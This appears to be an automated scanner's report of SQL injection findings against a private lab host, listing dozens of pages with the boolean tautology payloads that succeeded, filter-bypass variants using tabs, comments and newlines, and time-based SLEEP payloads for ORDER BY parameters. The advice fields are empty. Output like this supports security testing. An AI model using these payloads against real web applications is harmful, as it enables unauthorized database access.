Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 	and	14251=14251
	and	30502=30502
	or	51951=51951#
	and	21596=21597
Advice: 
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 	and	14251=14251
	and	30502=30502
	or	51951=51951#
	and	21596=21597
Advice: 
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 	and	14251=14251
	and	30502=30502
	or	51951=51951#
	and	21596=21597
Advice: 
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '/**/and/**/'82512'='82512
'/**/and/**/'92117'='92117
'/**/or/**/74450=74450#
'/**/and/**/'18896'='18897
Advice: 
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 
and
61154=61154

and
68636=68636

or
31128=31128#

and
42640=42641
Advice: 
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
VulnName: 
Query: {'name': 'hacker'}
Payload: '+and+'17704'='17704
'+and+'39156'='39156
'+or+32135=32135#
'+and+'56713'='56714
Advice: 
---
---
URL:http://192.168.42.133/sqli/example100.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example101.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example102.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example104.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example103.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example106.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example105.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example107.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example109.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example108.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example110.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example111.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example112.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example113.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example114.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example115.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example116.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example118.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example117.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example119.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example120.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example121.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example123.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example124.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example122.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example125.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example127.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example126.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example129.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example128.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example130.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example131.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example132.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example134.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example133.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example135.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example136.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example137.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example139.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example138.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example140.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example141.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'98573'='98573
'	and	'49047'='49047
'	or	17956=17956#
'	and	'1642'='1643
Advice: 
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: 
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: 
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: 
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: 
---